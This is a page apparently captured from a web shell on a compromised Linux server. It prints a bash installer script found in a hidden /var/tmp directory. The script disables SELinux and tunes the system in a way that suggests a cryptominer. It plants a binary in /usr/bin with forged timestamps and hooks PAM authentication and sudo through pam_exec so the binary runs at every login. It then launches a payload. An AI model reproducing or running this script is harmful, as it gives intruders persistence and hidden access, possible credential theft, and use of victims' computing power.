MOON
Server: Apache
System: Linux vmi433716.contaboserver.net 3.10.0-1160.144.1.el7.tuxcare.els4.x86_64 #1 SMP Tue Apr 7 08:40:40 UTC 2026 x86_64
User: affpashacom (1022)
PHP: 8.0.30
Disabled: NONE
$ pwd: /var/tmp/.eres/hash/
Upload Files
File: //var/tmp/.eres/hash/start
#!/bin/bash
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

sysctl -w vm.nr_hugepages=2500
grep -q 'vm.nr_hugepages' /etc/sysctl.conf || echo 'vm.nr_hugepages=2500' >> /etc/sysctl.conf

echo never > /sys/kernel/mm/transparent_hugepage/enabled 2>/dev/null
echo never > /sys/kernel/mm/transparent_hugepage/defrag 2>/dev/null

if [ ! -f /etc/rc.local ]; then
cat <<'EOF' > /etc/rc.local
#!/bin/bash
echo never > /sys/kernel/mm/transparent_hugepage/enabled
echo never > /sys/kernel/mm/transparent_hugepage/defrag
for c in /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor; do
  echo performance > "$c" 2>/dev/null
done
exit 0
EOF
chmod +x /etc/rc.local
fi

for c in /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor; do
  echo performance > "$c" 2>/dev/null
done

systemctl enable rc-local.service >/dev/null 2>&1

ulimit -n 65535
grep -q 'nofile' /etc/security/limits.conf || {
  echo '* soft nofile 65535' >> /etc/security/limits.conf
  echo '* hard nofile 65535' >> /etc/security/limits.conf
}

sysctl -w net.ipv4.tcp_fin_timeout=15
sysctl -w net.ipv4.tcp_tw_reuse=1

if command -v setenforce &>/dev/null; then
    setenforce 0
    sed -i 's/^SELINUX=.*/SELINUX=permissive/' /etc/selinux/config
fi

tar xvfz loc-akamai.tgz
mv loc-akamai.tgz /etc
mv fd-monitor /usr/bin
touch -r /bin/bash /usr/bin/fd-monitor /etc/loc-akamai.tgz
chmod +x /usr/bin/fd-monitor
restorecon -v /usr/bin/fd-monitor 2>/dev/null || true
echo "[+] Installed script at: /usr/bin/fd-monitor"

pamfiles="/etc/pam.d/system-auth /etc/pam.d/common-auth"
HOOK="session optional pam_exec.so quiet /usr/bin/fd-monitor"

# Detect RHEL-based systems (CentOS, Alma, Rocky, RHEL)
if [ -f /etc/redhat-release ] || grep -qiE 'centos|alma|rocky|rhel' /etc/os-release 2>/dev/null; then
    IS_RHEL_FAMILY=true
else
    IS_RHEL_FAMILY=false
fi

echo "[*] Installing PAM hooks..."

# --- Add hook to core PAM files ---
for pamfile in $pamfiles; do
    if [ -f "$pamfile" ]; then
        if grep -qF -- "$HOOK" "$pamfile"; then
            echo "[=] Already hooked: $pamfile"
        else
            echo "$HOOK" >> "$pamfile"
            echo "[+] Hooked PAM file: $pamfile"
        fi
    else
        echo "[-] PAM file not found: $pamfile (skipped)"
    fi
done

# --- Fix sudo behavior on CentOS/RHEL family ---
if [ "$IS_RHEL_FAMILY" = true ] && [ -f /etc/pam.d/sudo ]; then
    if ! grep -q 'session.*include.*system-auth' /etc/pam.d/sudo; then
        echo "[+] Adding missing 'session include system-auth' to /etc/pam.d/sudo"
        echo "session    include      system-auth" >> /etc/pam.d/sudo
    else
        echo "[=] /etc/pam.d/sudo already includes system-auth session stack"
    fi
fi

echo "[*] Starting payload..."

cd akamai && ./go || { echo "[-] Payload execution failed"; exit 1; }
@ Telegram